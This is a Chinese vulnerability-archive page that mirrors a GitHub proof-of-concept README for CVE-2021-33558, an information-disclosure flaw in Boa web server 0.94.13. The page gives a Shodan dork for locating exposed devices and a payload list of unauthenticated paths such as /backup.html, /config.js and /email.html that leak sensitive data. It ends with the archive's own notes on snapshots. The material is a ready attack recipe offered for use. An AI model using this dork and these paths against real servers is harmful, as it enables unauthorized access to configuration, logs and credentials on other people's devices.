POC详情: 691c00f12b5d482d7efbab7674edf353ee16912e

来源
https://github.com/anldori/CVE-2021-33558
关联漏洞
标题: Boa 信息泄露漏洞 (CVE-2021-33558)
描述:Boa是Boa开源的一种适用于嵌入式应用程序的开放源代码。 Boa 0.94.13 版本存在信息泄露漏洞,该漏洞允许远程攻击者通过错误配置获取敏感信息。
描述
CVE-2021-33558 POC
介绍
# CVE-2021-33558

Reference: https://www.cvedetails.com/cve/CVE-2021-33558

Shodan dork: ```product:"Boa Web Server" 0.94.13```

Payload:

```
/backup.html
/preview.html
/js/log.js
/log.html
/email.html
/online-users.html
/config.js
```

POC:

![image](https://user-images.githubusercontent.com/101538840/204190349-ebe87daa-36fd-4503-b27d-663a1365332b.png)

![image](https://user-images.githubusercontent.com/101538840/204190426-e5bb359b-d5cc-4289-a150-493913673415.png)
文件快照

 [4.0K]  /data/pocs/691c00f12b5d482d7efbab7674edf353ee16912e
└── [ 471]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。